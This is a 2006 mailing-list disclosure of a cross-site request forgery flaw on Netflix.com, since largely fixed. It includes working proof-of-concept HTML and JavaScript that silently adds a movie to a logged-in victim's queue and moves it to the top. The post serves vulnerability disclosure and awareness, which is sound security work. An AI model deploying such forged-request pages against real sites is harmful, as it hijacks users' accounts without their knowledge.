Web-App-Sec mailing list archive

Netflix.com XSRF vuln

Subject: Netflix.com XSRF vuln
Date: Mon, 16 Oct 2006 08:51:41 -0500
I just posted information to the Full Disclosure list about a Cross
Site Request Forgery (XSRF) vulnerability on Netflix.com.  Netflix has
recently fixed several of the most serious issues.

Some of you in the U.S. may be Netflix subscribers.  Here are some of
the things that could have been done to you if you visited the wrong
web page.

- add movies to your rental queue
- add a movie to the top of your rental queue
- change the name and address on your account
- change the email address and password on your account (i.e., take
over your account)
- cancel your account (Unconfirmed/Conjectured)

The exploits are extremely simple and are especially effective if the
victim chooses to stay logged on to the Netflix site.  For example, to
add a DVD to a victim's queue, an attacker would add an image tag to
his web page and just wait for Netflix subscribers to visit the page.

<img src="http://www.netflix.com/AddToQueue?movieid=70011204"
width="1" height="1" border="0">

Adding a DVD to the top of the queue takes a little JavaScript, but is
even nastier because it would probably be shipped before the victim
knew what had happened.

<html>
<head>
<script language="JavaScript" type="text/javascript">
<!-- Second request: move the movie just added to the top of the queue.
     The browser sends the victim's Netflix cookie with it automatically. -->
function load_image2()
{
 var img2 = new Image();
 img2.src="http://www.netflix.com/MoveToTop?movieid=70023965&fromq=true";
}
</script>
</head>
<body>
<!-- First request: add the movie to the queue via an invisible image. -->
<img src="http://www.netflix.com/AddToQueue?movieid=70023965"
width="1" height="1" border="0">
<script>
<!-- Wait two seconds so the AddToQueue request completes before MoveToTop fires. -->
setTimeout( 'load_image2()', 2000 );
</script>
</body>
</html>

I think XSRF could be a sleeping giant, kind of like XSS was a year or
two ago.  Jesse Burns has a great whitepaper about XSRF here:
http://www.isecpartners.com/documents/XSRF_Paper.pdf

Regards,

Dave Ferguson

